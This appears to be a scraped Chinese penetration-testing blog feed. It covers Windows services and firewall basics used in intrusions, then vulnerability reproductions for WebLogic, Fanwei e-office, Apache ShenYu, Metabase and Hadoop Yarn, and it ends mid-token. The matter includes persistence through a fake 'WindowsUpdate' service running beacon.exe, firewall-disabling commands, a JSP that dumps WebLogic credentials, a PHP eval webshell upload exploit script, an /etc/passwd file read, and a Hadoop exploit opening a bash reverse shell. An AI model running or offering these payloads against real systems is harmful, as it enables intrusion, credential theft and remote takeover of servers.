一项服务在其生存期内会经历几个内部状态。 首先,服务会安装到它将在其上运行的系统上。 此过程执行服务项目的安装程序,并将该服务加载到该计算机的服务控制管理器 中。 服务控制管理器是Windows 提供的用于管理服务的中央实用程序。</p><p> 必须在服务加载完成后启动它。 启动该服务以允许它开始运行。 可以从服务“服务控制管理器” 、“服务器资源管理器” ,或从通过调用 Start 方法的代码来启动服务。 Start 方法将处理进程传递给应用程序的OnStart 方法,并处理在那里定义的任何代码。</p><p> 正在运行的服务可以在此状态下无限期地存在,直到它停止或暂停,或者直到计算机关闭。 服务可以三种基本状态之一存在:<strong>Running</strong>、<strong>Paused</strong> 或 <strong>Stopped</strong>。 该服务还可以报告挂起命令的状态:ContinuePending、PausePending、StartPending 或 StopPending。 这些状态指示命令已发出(例</p><p>如,暂停正在运行的服务的命令),但尚未执行。 可以查询 Status 以确定服务所处的状态,或者在出现其中任一状态时使用 WaitForStatus 执行操作。</p><p> 可以从“服务控制管理器” 、“服务器资源管理器” ,或通过调用代码中的方法来暂停、停止或恢复服务。其中的每个操作都可以调用服务中的相关过程(OnStop、OnPause 或 OnContinue),可以在其中定义在服务更改状态时执行的其他处理进程。</p><p> <strong>4.1.1 services.msc</strong></p><p>在 Windows 中,打开 “服务”桌面应用程序。 按“Windows 徽标键+R”以打开“运行”框,然后输入<code>services.msc</code> 并按 Enter 或单击“确定” 。你会看到 “服务”中列出的服务按其设置的显示名称的字母顺序显示。</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211207105006435.png" alt="服务"></p><p>每一行列出了服务的五个基本属性 (名称、描述、状态、启动类型、登录为)。其中我们比较关心的是服务的 <strong>状态</strong> 和 <strong>启动类型</strong>,状态有三种基本状态,分别是 <strong>Running</strong>、<strong>Paused</strong> 、 <strong>Stopped</strong>。启动类型则有如下四种类型 : <strong>手动</strong>、<strong>自动</strong>、<strong>自动</strong>(<strong>延迟启动</strong>)<strong>、禁用</strong>。</p><ul><li><p>手动 :服务只会在明确被调用的时候才会启动自动 :服务会在系统启动时启动</p></li><li><p>自动(延迟启动):服务会在系统启动一段时间后启动。此选项在 windows Vista 中引用,目的是</p></li><li><p>降低等待时间。</p></li><li><p>禁用 :服务被停用。</p></li></ul><p>通过 <strong>services.msc</strong> 可以轻松对服务的属性进行编辑。</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211207105134387.png" alt="服务编辑"></p><p><strong>4.1.2 使用</strong> <strong>SC</strong> <strong>控制服务</strong></p><pre class="line-numbers language-txt" data-language="txt"><code class="language-txt">描述: SC 是用来与服务控制管理器和服务进行通信 的命令行程序。用法: sc <server> [command] [service name] <option1> <option2>... <server> 选项的格式为 "\\ServerName" 可通过键入以下命令获取有关命令的更多帮助: "sc [command]" 命令: query-----------查询服务的状态, 或枚举服务类型的状态。 queryex---------查询服务的扩展状态, 或枚举服务类型的状态。 start-----------启动服务。 pause-----------向服务发送 PAUSE 控制请求。 interrogate-----向服务发送 INTERROGATE 控制请求。 continue--------向服务发送 CONTINUE 控制请求。 stop------------向服务发送 STOP 请求。 config----------更改服务的配置(永久)。 description-----更改服务的描述。 failure---------更改失败时服务执行的操作。 failureflag-----更改服务的失败操作标志。 sidtype---------更改服务的服务 SID 类型。 privs-----------更改服务的所需特权。 managedaccount--更改服务以将服务帐户密码 标记为由 LSA 管理。 qc--------------查询服务的配置信息。 qdescription----查询服务的描述。 qfailure--------查询失败时服务执行的操作。 qfailureflag----查询服务的失败操作标志。 qsidtype--------查询服务的服务 SID 类型。 qprivs----------查询服务的所需特权。 qtriggerinfo----查询服务的触发器参数。 qpreferrednode--查询服务的首选 NUMA 节点。 qmanagedaccount-查询服务是否将帐户 与 LSA 管理的密码结合使用。 qprotection-----查询服务的进程保护级别。 quserservice----查询用户服务模板的本地实例。 delete ----------(从注册表中)删除服务。 create----------创建服务(并将其添加到注册表中)。 control---------向服务发送控制。 sdshow----------显示服务的安全描述符。 sdset-----------设置服务的安全描述符。 showsid---------显示与任意名称对应的服务 SID 字符串。 triggerinfo-----配置服务的触发器参数。 preferrednode---设置服务的首选 NUMA 节点。 GetDisplayName--获取服务的 DisplayName。 GetKeyName------获取服务的 ServiceKeyName。 EnumDepend------枚举服务依赖关系。 以下命令不需要服务名称: sc <server> <command> <option> boot------------(ok | bad)指示是否应将上一次启动另存为 最近一次已知的正确启动配置 Lock------------锁定服务数据库 QueryLock-------查询 SCManager 数据库的 LockStatus示例: sc start MyServiceQUERY 和 QUERYEX 选项: 如果查询命令带服务名称,将返回 该服务的状态。其他选项不适合这种 情况。如果查询命令不带参数或 带下列选项之一,将枚举此服务。 type= 要枚举的服务的类型(driver, service, userservice, all) (默认 = service) state= 要枚举的服务的状态 (inactive, all) (默认 = active) bufsize= 枚举缓冲区的大小(以字节计) (默认 = 4096) ri= 开始枚举的恢复索引号 (默认 = 0) group= 要枚举的服务组 (默认 = all groups)语法示例sc query - 枚举活动服务和驱动程序的状态sc query eventlog - 显示 eventlog 服务的状态sc queryex eventlog - 显示 eventlog 服务的扩展状态sc query type= driver - 仅枚举活动驱动程序sc query type= service - 仅枚举 Win32 服务sc query state= all - 枚举所有服务和驱动程序sc query bufsize= 50 - 枚举缓冲区为 50 字节sc query ri= 14 - 枚举时恢复索引 = 14sc queryex group= "" - 枚举不在组内的活动服务sc query type= interact - 枚举所有不活动服务sc query type= driver group= NDIS - 枚举所有 NDIS 驱动程序<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><p><strong>sc 常用命令</strong></p><pre class="line-numbers language-none"><code class="language-none">sc \\ServerName query spooler // 查看远程机器的服务状态 sc qc spooler // 查询服务的配置信息 sc start spooler // 停止指定服务 sc start spooler // 开启指定服务 sc query | findstr Manager // 查询所有服务名中有 Manager 的服务 sc delete <ServerName> // 删除指定服务 sc create WindowsUpdate binPath="cmd /K C:\windows\beacon.exe" DisplayName="WindowsUpdate" // 创建名为 WindowsUpdate 的服务 sc create WindowsUpdate binPath="cmd /k C:\windows\beacon.exe" DisplayName="WindowsUpdate" start=auto // 创建名为 WindowsUpdate 的服务并设置启动状 态为自启动 sc sdshow spooler // 显示服务的安全描述符<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><h3 id="五、Firewall"><a href="#五、Firewall" class="headerlink" title="五、Firewall"></a>五、Firewall</h3><blockquote><p>Windows 防火墙(在Windows 10 中正式称为Windows Defender 防火墙),是MicrosoftWindows的防火墙组件。它首先包含在Windows XP和Windows Server 2003 中。在 2004 年发布Windows XP Service Pack 2之前,它被称为Internet 连接防火墙。随着 2017 年 9 月 Windows10 版本 1709 的发布,它更名为 Windows Defender 防火墙。</p></blockquote><p><strong>5.1 windows防火墙</strong></p><p>Windows Defender高级安全防火墙提供基于主机的双向网络流量筛选,并阻止未经授权的网络流量流入或流出本地设备</p><p>windows系统默认的规则:默认阻止入站连接,默认允许出站连接。也就是说,凡是入站连接,任何程序和端口都要在防火墙上配置入站规则,否则都会被禁止</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211207110647693.png" alt="Firewall"></p><p>三种配置文件的区别:</p><table><thead><tr><th>域</th><th>连接到可检测计算机加入域的域控制器的网络时,应用于网络适配器。</th></tr></thead><tbody><tr><td>专用</td><td>家中或在工作中信任网络上的人和设备的网络。选择专用网络时,网络发现会打开,但文件和打印机共享会关闭。专用配置文件设置应该比域配置文件设置更为严格。</td></tr><tr><td>公用</td><td>公共场所的网络。此位置可防止其他计算机看到该计算机。当公共网络是选定的网络位置时,网络发现以及文件和打印机共享将关闭。由于计算机连接到无法控制安全性的公用网络,因此公用配置文件设置应该最为严格。</td></tr></tbody></table><p>配置文件的具体配置相关</p><ul><li><p><strong>防火墙状态。</strong>您可以为每个配置文件单独打开或关闭防火墙。</p></li><li><p><strong>入站连接。</strong>您可以阻止与任何活动防火墙规则不匹配的连接(这是默认设置),无论入站规则规范如何,都阻止所有连接,或允许与活动防火墙规则不匹配的入站连接。<strong>出站连接。</strong>您可以允许与任何活动防火墙规则不匹配的连接(这是默认设置)或阻止与活动防火墙规则不匹配的出站连接。</p></li><li><p><strong>受保护的网络连接。</strong>您可以选择希望 Windows 防火墙帮助保护的连接(例如,本地连接)。您可以配置显示通知和单播响应,以及通过组策略分发的合并规则。您可以配置和启用日志记录。</p></li><li><p><strong>IPsec</strong> <strong>设置。</strong>您可以为 IPsec 配置配置默认值。IPSEC</p></li><li><p>在通信之前和期间提供相互身份验证。</p></li><li><p>强制双方在沟通过程中表明自己的身份。</p></li><li><p>通过 IP 流量加密和数字数据包身份验证实现机密性。</p></li></ul><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211207111119412.png" alt="IPsec"></p><p><strong>WF.msc</strong></p><p>打开“控制面板”,然后输入 允许应用或功能通过Windows Defender防护墙 你会看到 “高级安全Windows Defender防火墙” 或 按“Windows 徽标键+R”以打开“运行”框,然后输入<code>WF.msc </code>并按 <code>Enter</code>或单击“确定” 。</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211207111225819.png" alt="规则"></p><p>入站规则 出战规则 连接安全规则 监视 4个列表</p><ul><li><p>入站规则:其他网络设备或机器访问自己机器的触发的规则。</p></li><li><p>出站规则:自己机器去访问其他网络设备或机器触发的规则。</p></li></ul><p><strong>netsh在渗透中的利用</strong></p><ul><li>修改防火墙配置(不会被360拦截) </li></ul><pre class="line-numbers language-none"><code class="language-none">1.开启防火墙 netsh advfirewall set allprofiles state on 2.关闭防火墙 netsh advfirewall set allprofiles state off 3.恢复防火墙默认设置 netsh advfirewall reset 4.添加远程桌面入站规则允许端口3389 netsh advfirewall firewall add rule name=远程桌面(TCP-In-3389) protocol=TCP dir=in localport=3389 action=allow 5.删除规则(可以删除特定的防火墙规则) netsh advfirewall firewall delete rule name=远程桌面(TCP-In-3389) 6.导出防火墙配置到文件 netsh advfirewall export c:\xxx.pol 7.导入防火墙配置文件到系统中 netsh advfirewall import c:\xxx.pol<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><ul><li>POWERSHELL</li></ul><pre class="line-numbers language-none"><code class="language-none">1.关闭所有配置文件的防火墙 Set-NetFirewallProfile -All -Enabled False 2.打开所有配置文件的防火墙 Set-NetFirewallProfile -All -Enabled True 3.设置允许专业配置文件 80 443端口入站规则 New-NetFirewallRule -DisplayName 'HTTP-Inbound' -Profile @('Private') - Direction Inbound -Action Allow -Protocol TCP -LocalPort @('80', '443') 4.允许特定ip入站规则连接3389 New-NetFirewallRule -DisplayName "AllowRDP" –RemoteAddress 192.168.2.200 - Direction Inbound -Protocol TCP –LocalPort 3389 -Action Allow<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><ul><li>端口转发</li></ul><pre class="line-numbers language-none"><code class="language-none">1.查看所有端口代理参数 netsh interface portproxy show all 2.将本地1337端口流量转发到192.168.1.2 的8000端口 netsh interface portproxy add v4tov4 listenport=6666 connectport=8000 connectaddress=192.168.1.2 端口转发配置是保存在注册表的 Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp 3.删除端口转发的规则 netsh interface portproxy delete v4tov4 listenport=6666<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>]]></content>
<categories>
<category> 内网安全 </category>
</categories>
<tags>
<tag> 内网安全 </tag>
</tags>
</entry>
<entry>
<title>获取Weblogic console用户名&密码(免解密)</title>
<link href="/article/61b8d5ae.html"/>
<url>/article/61b8d5ae.html</url>
<content type="html"><![CDATA[<p>以往遇上weblogic的站点时都是通过密钥进行解密获取console的密码,甚至但是解密方法就出现好几种</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/144720808-7e3efafd-8126-4994-bd78-945e314ff3ac-20211206112503285.png" alt="image"></p><p>但是前几个小时在twitter @jas502n师傅公开了<a href="https://twitter.com/jas502n/status/1467122190760177664">Use T3 protocol Get weblogic console username, password</a>这个姿势,于是赶紧学习学习!!!</p><p>断点看看代码细节:</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/144720899-5b80c842-e6dd-47c2-b2fc-e3c60ba2a8f5-20211206112525225.png" alt="image"></p><p>代码实现</p><pre class="line-numbers language-none"><code class="language-none"><%@page import="java.lang.reflect.Field" %><%@page import="java.lang.reflect.Method" %><% /** * 已测试: * 10.3.6.0 */ try{ ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); Class httpDataTransferHandler = classLoader.loadClass("weblogic.deploy.service.datatransferhandlers.HttpDataTransferHandler"); Class managementService = classLoader.loadClass("weblogic.management.provider.ManagementService"); Class authenticatedSubject = classLoader.loadClass("weblogic.security.acl.internal.AuthenticatedSubject"); Class propertyService = classLoader.loadClass("weblogic.management.provider.PropertyService"); Field KERNE_ID = httpDataTransferHandler.getDeclaredField("KERNE_ID"); KERNE_ID.setAccessible(true); Method getPropertyService = managementService.getMethod("getPropertyService",authenticatedSubject); getPropertyService.setAccessible(true); Object prop = getPropertyService.invoke((Object) null,KERNE_ID.get((Object) null)); Method getTimestamp1 = propertyService.getMethod("getTimestamp1"); getTimestamp1.setAccessible(true); Method getTimestamp2 = propertyService.getMethod("getTimestamp2"); getTimestamp2.setAccessible(true); String username = (String) getTimestamp1.invoke(prop); String password = (String) getTimestamp2.invoke(prop); response.getWriter().write( username + "/" + password); }catch (Exception e) { e.printStackTrace(); }%><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><p>测试效果</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211206112550657.png" alt="image-20211206112550657"></p>]]></content>
<categories>
<category> 技巧类 </category>
</categories>
<tags>
<tag> Weblogic </tag>
</tags>
</entry>
<entry>
<title>泛微 e-office v9.0任意文件上传漏洞(CNVD-2021-49104)</title>
<link href="/article/b8b3650.html"/>
<url>/article/b8b3650.html</url>
<content type="html"><![CDATA[<p>[toc]</p><h2 id="泛微-e-office-v9-0任意文件上传漏洞-CNVD-2021-49104"><a href="#泛微-e-office-v9-0任意文件上传漏洞-CNVD-2021-49104" class="headerlink" title="泛微 e-office v9.0任意文件上传漏洞(CNVD-2021-49104)"></a>泛微 e-office v9.0任意文件上传漏洞(CNVD-2021-49104)</h2><p>参考:</p><pre class="line-numbers language-none"><code class="language-none">https://cnvd.org.cn/flaw/show/CNVD-2021-49104https://mp.weixin.qq.com/s/P75K_0869h-nWHRMu06zgQhttps://mp.weixin.qq.com/s/J4R-PRJq_oi58iWKh_1Oiw泛微oa跟eoffice区别:常见oa是ecology,eoffice是轻量版<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211127222822790.png" alt="范围产品体系"></p><h3 id="一、漏洞概述"><a href="#一、漏洞概述" class="headerlink" title="一、漏洞概述"></a>一、漏洞概述</h3><p>泛微e-office是泛微旗下的一款标准协同移动办公平台。</p><p>泛微e-office 未能正确处理上传模块中用户输入导致的,攻击者可以构造恶意的上传数据包,实现任意代码执行,攻击者可利用该漏洞获取服务器控制权。</p><h3 id="二、影响范围"><a href="#二、影响范围" class="headerlink" title="二、影响范围"></a>二、影响范围</h3><pre class="line-numbers language-none"><code class="language-none">泛微e-office V9.0<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><h3 id="三、漏洞复现"><a href="#三、漏洞复现" class="headerlink" title="三、漏洞复现"></a>三、漏洞复现</h3><p>安装包:<code>链接: https://pan.baidu.com/s/1i4DQ4YD 密码: fegm</code></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211127213740163.png" alt="index页面"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211127214658848.png" alt="利用点"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211127214750322.png" alt="命令执行"></p><h4 id="POC:"><a href="#POC:" class="headerlink" title="POC:"></a>POC:</h4><pre class="line-numbers language-none"><code class="language-none">POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1Host: 127.0.0.1:8082User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36Accept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Connection: closeAccept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348Content-Length: 333Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4--e64bdf16c554bbc109cecef6451c26a4Content-Disposition: form-data; name="Filedata"; filename="test.php"Content-Type: image/jpeg<?php$a=$_POST['H'];eval("$a");//eval会将输入的$a作为php语句执行,因此只要对_赋一定的system命令值,就能够执行系统命令?>--e64bdf16c554bbc109cecef6451c26a4--<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><h4 id="EXP:"><a href="#EXP:" class="headerlink" title="EXP:"></a>EXP:</h4><p>泛微 e-office v9.0任意文件上传漏洞 (CNVD-2021-49104)</p><pre class="line-numbers language-none"><code class="language-none">import requestsimport argparseargs = argparse.ArgumentParser(description='泛微 e-office v9.0任意文件上传漏洞 (CNVD-2021-49104)')args.add_argument('-u', help='漏洞URL<如:127.0.0.1:8080>')args.add_argument('-e', help='执行命令')a = args.parse_args()header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36','Accept-Encoding': 'gzip, deflate','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9','Connection': 'close','Accept-Language': 'zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6','Cookie': 'LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348','Content-Length': '193','Content-Type': 'multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4'}#a.os = '<?php phpinfo();?>'data = '''--e64bdf16c554bbc109cecef6451c26a4Content-Disposition: form-data; name="Filedata"; filename="test.php"Content-Type: image/jpeg{}--e64bdf16c554bbc109cecef6451c26a4--'''.format(a.e)def scan(url): url = url + '/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=' r = requests.post(url=url, data=data, headers=header) if r.status_code == 200 and 'logo-eoffice.php' in r.text: print('存在泛微 e-office v9.0任意文件上传漏洞 (CNVD-2021-49104)') print('请查看</images/logo/logo-eoffice.php>目录') else: print('不存在泛微 e-office v9.0任意文件上传漏洞 (CNVD-2021-49104)')if __name__ == '__main__': #a.u = 'http://121.4.67.191:8082/' scan(a.u)<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><h3 id="四、修复方案"><a href="#四、修复方案" class="headerlink" title="四、修复方案"></a>四、修复方案</h3><pre class="line-numbers language-none"><code class="language-none">厂商已提供漏洞修补方案,建议用户下载使用:http://v10.e-office.cn/eoffice9update/safepack.zip<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>]]></content>
<categories>
<category> 漏洞复现 </category>
</categories>
<tags>
<tag> 泛微 e-office </tag>
</tags>
</entry>
<entry>
<title>Apache ShenYu JWT认证缺陷漏洞(CVE-2021-37580)</title>
<link href="/article/c3105443.html"/>
<url>/article/c3105443.html</url>
<content type="html"><![CDATA[<h3 id="一、漏洞描述"><a href="#一、漏洞描述" class="headerlink" title="一、漏洞描述"></a>一、漏洞描述</h3><p><strong>什么是 Apache ShenYu?</strong></p><p>Apache ShenYu 是一个异步的,高性能的,跨语言的,响应式的 API 网关</p><p><strong>功能:</strong></p><ul><li><p>支持各种语言(http 协议),支持 Dubbo、 Spring Cloud、 gRPC、 Motan、 Sofa、 Tars 等协议。</p></li><li><p>插件化设计思想,插件热插拔,易扩展。</p></li><li><p>灵活的流量筛选,能满足各种流量控制。</p></li><li><p>内置丰富的插件支持,鉴权,限流,熔断,防火墙等等。</p></li><li><p>流量配置动态化,性能极高。</p></li><li><p>支持集群部署,支持 A/B Test,蓝绿发布。</p></li></ul><h3 id="二、影响范围"><a href="#二、影响范围" class="headerlink" title="二、影响范围"></a>二、影响范围</h3><pre class="line-numbers language-none"><code class="language-none">Apache ShenYu 2.3.0Apache ShenYu 2.4.0<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre><h3 id="三、漏洞复现"><a href="#三、漏洞复现" class="headerlink" title="三、漏洞复现"></a>三、漏洞复现</h3><pre class="line-numbers language-none"><code class="language-none">docker pull apache/shenyu-admin:2.4.0docker run -d -p 9095:9095 apache/shenyu-admin:2.4.0<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre><p>EXP:<code>https://github.com/Liang2580/CVE-2021-37580/</code></p>]]></content>
<categories>
<category> 漏洞复现 </category>
</categories>
<tags>
<tag> Apache ShenYu </tag>
</tags>
</entry>
<entry>
<title>Metabase 敏感信息泄露漏洞(CVE-2021-41277)</title>
<link href="/article/94f0aed.html"/>
<url>/article/94f0aed.html</url>
<content type="html"><![CDATA[<h2 id="Metabase-敏感信息泄露漏洞(CVE-2021-41277)"><a href="#Metabase-敏感信息泄露漏洞(CVE-2021-41277)" class="headerlink" title="Metabase 敏感信息泄露漏洞(CVE-2021-41277)"></a>Metabase 敏感信息泄露漏洞(CVE-2021-41277)</h2><h3 id="一、漏洞描述"><a href="#一、漏洞描述" class="headerlink" title="一、漏洞描述"></a>一、漏洞描述</h3><p>metabase 是一个简单、开源的数据分析平台。</p><p>在受影响的版本中,自定义 GeoJSON 地图(admin->settings->maps->custom maps->add a map)操作缺少权限验证,攻击者可通过该漏洞获得敏感信息。该漏洞CVSS评分:9.9,危害等级:严重</p><h4 id="CVE-编号"><a href="#CVE-编号" class="headerlink" title="CVE 编号"></a>CVE 编号</h4><pre class="line-numbers language-none"><code class="language-none">CVE-2021-41277<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><p>FOFA 查询<a href="https://fofa.so/result?qbase64=YXBwPSJNZXRhYmFzZSI=">app=”metabase”</a></p><h3 id="二、影响范围"><a href="#二、影响范围" class="headerlink" title="二、影响范围"></a>二、影响范围</h3><p>影响版本:</p><pre class="line-numbers language-none"><code class="language-none">metabase version < 0.40.5metabase version >= 1.0.0, < 1.40.5<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre><p>修复版本:</p><pre class="line-numbers language-none"><code class="language-none">metabase version >= 0.40.5metabase version >= 1.40.5<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre><h3 id="三、漏洞复现"><a href="#三、漏洞复现" class="headerlink" title="三、漏洞复现"></a>三、漏洞复现</h3><h4 id="3-1-环境搭建"><a href="#3-1-环境搭建" class="headerlink" title="3.1 环境搭建"></a>3.1 环境搭建</h4><pre class="line-numbers language-none"><code class="language-none">docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.40.4<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211128174201171.png" alt="拉起环境"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211128174233993.png" alt="Index页面"></p><h4 id="3-2-EXP"><a href="#3-2-EXP" class="headerlink" title="3.2 EXP"></a>3.2 EXP</h4><p><code>Target IP:/api/geojson?url=file:/etc/passwd</code></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211128175503869.png" alt="image-20211128175503869"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211128175434887.png" alt="image-20211128175434887"></p>]]></content>
<categories>
<category> 漏洞复现 </category>
</categories>
<tags>
<tag> metabase </tag>
</tags>
</entry>
<entry>
<title>Hadoop Yarn RPC未授权访问漏洞</title>
<link href="/article/e8c0069d.html"/>
<url>/article/e8c0069d.html</url>
<content type="html"><![CDATA[<ul><li><p>参考:</p><ul><li><p><a href="https://avd.aliyun.com/detail?id=AVD-2021-864101">https://avd.aliyun.com/detail?id=AVD-2021-864101</a></p></li><li><p><a href="https://mp.weixin.qq.com/s/0F06a7GppFz3KV3XNb-Xrg">https://mp.weixin.qq.com/s/0F06a7GppFz3KV3XNb-Xrg</a></p></li><li><p><a href="https://eviladan0s.github.io/2021/11/16/hadoop-unauth-rce/">https://eviladan0s.github.io/2021/11/16/hadoop-unauth-rce/</a></p></li><li><p><a href="https://github.com/cckuailong/YarnRpcRCE">https://github.com/cckuailong/YarnRpcRCE</a></p></li></ul></li></ul><h2 id="Hadoop-Yarn-RPC未授权访问漏洞"><a href="#Hadoop-Yarn-RPC未授权访问漏洞" class="headerlink" title="Hadoop Yarn RPC未授权访问漏洞"></a>Hadoop Yarn RPC未授权访问漏洞</h2><h3 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h3><blockquote><p>Hadoop Yarn作为Hadoop核心组件之一,负责将资源分配至各个集群中运行各种应用程序,并调度不同集群节点上的任务执行。近日阿里云应急响应中心监测到 Hadoop Yarn RPC未授权访问漏洞在野利用事件。Hadoop Yarn默认对外开放RPC服务,攻击者可利用RPC服务执行任意命令,控制服务器。同时由于Hadoop Yarn RPC服务访问控制机制开启方式与REST API不一样,因此即使在 REST API有授权认证的情况下,RPC服务所在端口仍然可以未授权访问。阿里云应急响应中心提醒 Apache Hadoop 用户尽快采取安全措施阻止漏洞攻击。</p></blockquote><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211120235506443.png" alt="默认页面"></p><h3 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h3><p>通过ResourceManager REST API,可以让用户获取集群的相关信息。存在接口:</p><pre class="line-numbers language-none"><code class="language-none">/ws/v1/cluster/apps/new-application/ws/v1/cluster/apps<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre><p>不推荐一键利用工具:<a href="https://github.com/cckuailong/YarnRpcRCE/releases/tag/0.0.1">https://github.com/cckuailong/YarnRpcRCE/releases/tag/0.0.1</a></p><p>EXP:Hadoop Yarn.py</p><pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> requeststarget <span class="token operator">=</span> <span class="token string">'http://Target:Port/'</span>url <span class="token operator">=</span> target <span class="token operator">+</span> <span class="token string">'ws/v1/cluster/apps/new-application'</span>resp <span class="token operator">=</span> requests<span class="token punctuation">.</span>post<span class="token punctuation">(</span>url<span class="token punctuation">)</span>app_id <span class="token operator">=</span> resp<span class="token punctuation">.</span>json<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token string">'application-id'</span><span class="token punctuation">]</span>url <span class="token operator">=</span> target <span class="token operator">+</span> <span class="token string">'ws/v1/cluster/apps'</span>data <span class="token operator">=</span> <span class="token punctuation">{</span> <span class="token string">'application-id'</span><span class="token punctuation">:</span> app_id<span class="token punctuation">,</span> <span class="token string">'application-name'</span><span class="token punctuation">:</span> <span class="token string">'get-shell'</span><span class="token punctuation">,</span> <span class="token string">'am-container-spec'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token string">'commands'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token string">'command'</span><span class="token punctuation">:</span> <span class="token string">'/bin/bash -i >& /dev/tcp/Your IP/Port 0>&1'</span><span class="token punctuation">,</span> <span class="token punctuation">}</span><span class="token punctuation">,</span> <span class="token punctuation">}</span><span class="token punctuation">,</span> <span class="token string">'application-type'</span><span class="token punctuation">:</span> <span class="token string">'YARN'</span><span class="token punctuation">,</span><span class="token 